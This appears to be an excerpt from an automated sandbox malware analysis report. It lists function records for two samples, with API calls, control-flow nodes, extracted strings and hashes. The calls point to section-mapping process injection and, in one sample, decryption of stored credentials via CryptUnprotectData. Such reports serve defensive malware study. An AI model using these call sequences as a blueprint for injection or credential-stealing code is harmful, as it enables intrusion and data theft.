                                                                                control_flow_graph 155 401615-40165a 163 40165d-401670 call 4012a9 155->163 164 40164e-401656 155->164 167 401672 163->167 168 401675-40167a 163->168 164->163 167->168 170 401680-401691 168->170 171 401991-401999 168->171 174 401697-4016c0 170->174 175 40198f-4019e0 call 4012a9 170->175 171->168 174->175 183 4016c6-4016dd NtDuplicateObject 174->183 183->175 184 4016e3-401707 NtCreateSection 183->184 187 401763-401789 NtCreateSection 184->187 188 401709-40172a NtMapViewOfSection 184->188 187->175 189 40178f-401793 187->189 188->187 191 40172c-401748 NtMapViewOfSection 188->191 189->175 192 401799-4017ba NtMapViewOfSection 189->192 191->187 193 40174a-401760 191->193 192->175 195 4017c0-4017dc NtMapViewOfSection 192->195 193->187 195->175 197 4017e2 call 4017e7 195->197
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                                • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                                                • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                                • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65

                                                                                Control-flow Graph (graph image not recovered): first block 401635-40165a; calls in graph: 4012a9, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 4017e7
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                • String ID:
                                                                                • API String ID: 1652636561-0
                                                                                • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                                • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                                                • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                                • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24

                                                                                Control-flow Graph (graph image not recovered): first block 40162d-40165a; calls in graph: 4012a9, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 4017e7
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                                • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                                                • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                                • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24

                                                                                Control-flow Graph (graph image not recovered): first block 401620-40165a; calls in graph: 4012a9, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 4017e7
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                                • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                                                • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                                • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24

                                                                                Control-flow Graph (graph image not recovered): first block 401658-401670; calls in graph: 4012a9, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 4017e7
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                                • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                                                • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                                • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24

                                                                                Control-flow Graph (graph image not recovered): first block 2e1003c-2e10047; calls in graph: 2e10a3f, 2e10e0f, 2e10d90, VirtualAlloc, 2e10a69, VirtualProtect, 2e10cce, 2e10ce7, VirtualFree, LoadLibraryA
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E1024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2e10000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: 05d9d281a1c433bce65ea9a5464aedae69b2998bd44d145af81311050d83877e
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 7E526974A01229DFDB64CF58C984BACBBB1BF09314F1480E9E94DAB351DB30AA85CF14

                                                                                Control-flow Graph (graph image not recovered): first block 3011b05-3011b1e; calls in graph: CreateToolhelp32Snapshot, Module32First, 30117c4
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 03011B2D
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 03011B4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0300B000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_300b000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: ebb6c675da44e3c295fd9e33d64eafa9ff2b8da62e2cf24506975e8f85dd7550
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 91F0F6361017116FD7687BF89CCCBAFB3ECAF49620F140568E743954C0EB70E8054A60

                                                                                Control-flow Graph (graph image not recovered): first block 2e10e0f-2e10e24; calls in graph: SetErrorMode (twice)
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02E10223,?,?), ref: 02E10E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02E10223,?,?), ref: 02E10E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2e10000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: 8542446d127bdfb01e3c0bf921da1d9e01cee5e862faad54c88cd0ae9bd8b7d4
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: A4D0123114512877DB002A95DC09BCD7B1CDF05B66F008021FB0DD9080C770954046E5

                                                                                Control-flow Graph (graph image not recovered): first block 401a01-401a02; calls in graph: 4012a9, Sleep, 401524, 401615
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                                • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                                                • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                                • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B

                                                                                Control-flow Graph (graph image not recovered): first block 4019e3-4019fc; calls in graph: 4012a9, Sleep, 401524, 401615
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                                • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                                                • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                                • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                                • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                                                • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                                • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                                • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                                                • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                                • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                                • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                                                • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                                • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 03011815
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0300B000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_300b000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: 1e34423dd79a0492f94bb9b4b67620fad58f7e990735fc39dde29ee12ec70419
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: 16112B79A00208EFDB05DF98C985E99BFF5EF08350F0580A4FA489B362D775EA50DB80

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                                • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                                                • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                                • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B

                                                                                Execution Graph

                                                                                Execution Coverage:7.8%
                                                                                Dynamic/Decrypted Code Coverage:34.1%
                                                                                Signature Coverage:8%
                                                                                Total number of Nodes:311
                                                                                Total number of Limit Nodes:10

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
                                                                                • API String ID: 0-879020378
                                                                                • Opcode ID: d3e6218c0b6d68e631ba44012775654cbb5f14155eaeb5d0a54eed9368251c96
                                                                                • Instruction ID: bd7178ecccf1f1e773a4192e4ca540b31a3e3f12fd5816677c43404a507449fe
                                                                                • Opcode Fuzzy Hash: d3e6218c0b6d68e631ba44012775654cbb5f14155eaeb5d0a54eed9368251c96
                                                                                • Instruction Fuzzy Hash: B9F104B0A003059FE7105F65D885727BBE4AF54308F14853EE886A73E2EB3DE914CB5A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                                                • String ID:
                                                                                • API String ID: 1449868515-3916222277
                                                                                • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                                                • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2PBb$Yceh$]hW9
                                                                                • API String ID: 0-1551782443
                                                                                • Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                                                • Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
                                                                                • Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                                                • Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb$gdeb$rr$}x$a_
                                                                                • API String ID: 0-3617765606
                                                                                • Opcode ID: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                                                • Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
                                                                                • Opcode Fuzzy Hash: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                                                • Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$01$ZR\;$[hct${hmn
                                                                                • API String ID: 0-1484469362
                                                                                • Opcode ID: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                                                • Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
                                                                                • Opcode Fuzzy Hash: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                                                • Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID: .$=
                                                                                • API String ID: 834300711-1678909263
                                                                                • Opcode ID: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                                                • Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
                                                                                • Opcode Fuzzy Hash: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                                                • Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )$IEND
                                                                                • API String ID: 0-707183367
                                                                                • Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                                                • Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
                                                                                • Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
